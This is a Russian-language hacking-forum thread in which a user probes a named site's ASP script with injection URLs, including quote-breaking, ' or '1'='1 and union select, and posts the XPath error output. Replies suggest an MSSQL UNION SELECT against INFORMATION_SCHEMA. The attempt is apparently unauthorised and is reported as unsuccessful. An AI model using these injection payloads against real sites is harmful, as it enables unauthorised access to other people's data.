Нашел бажный скрипт, но не пойму что делать, первый раз с таким столкнулся, какие-то странные ошибки возвращает.

_http://www.server.ru/?prefix=000001%27+bla

msxml3.dll ошибка '80004005'

Íåîáõîäèìûé ìàðêåð ']' íàéäåí 'NAME'. //node[@id='000001' -->bla<--']

/ServerScripts/site.documents.inc.asp, line 16

_http://www.server.ru/?prefix=00010000%27+%27union+select+null

msxml3.dll ошибка '80004005'

Íåîáõîäèìûé ìàðêåð ']' íàéäåí 'STRING'. //node[@id='00010000' -->'union select null'<--]

/ServerScripts/site.documents.inc.asp, line 16

а так работает _http://www.server.ru/?prefix=00010000%27+or+%271%27=%271

Связка Asp идёт чаще всего с Mssql. Так что могу посоветовать одно - читать статьи по Mssql
И вообще, врядли у тебя что-то получится

однозначно MSSQL
попробуй такой запрос.
?prefix=000001 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

по идее может отобразиться назвние талбицы). эксперементируй в общем и читай доки по скулю ms sql.

ps таких ошибок я не видел раньше) наверно там используется хранимая процедура..ваще хз)

Не-а )) тут не процедура, если вообще ASP детально рассмотреть, то там компилируется бибилиотека, в данном случае это msxml3.dll а дальше, ей передаются значения формы и сними уже идут действия как с объектами.
И всё же ещё раз скажу, тут у тебя ничего не выйдет, т.к. в ASP.NET малый вывод информации об ошибках

NaX[no]r†: могу только согласиться..... была такая же бага - раскрутить не смог

Всем спасибо за ответы, но багу я так и не по юзал, знаний пока маловато в этой области. Пошел читать доки...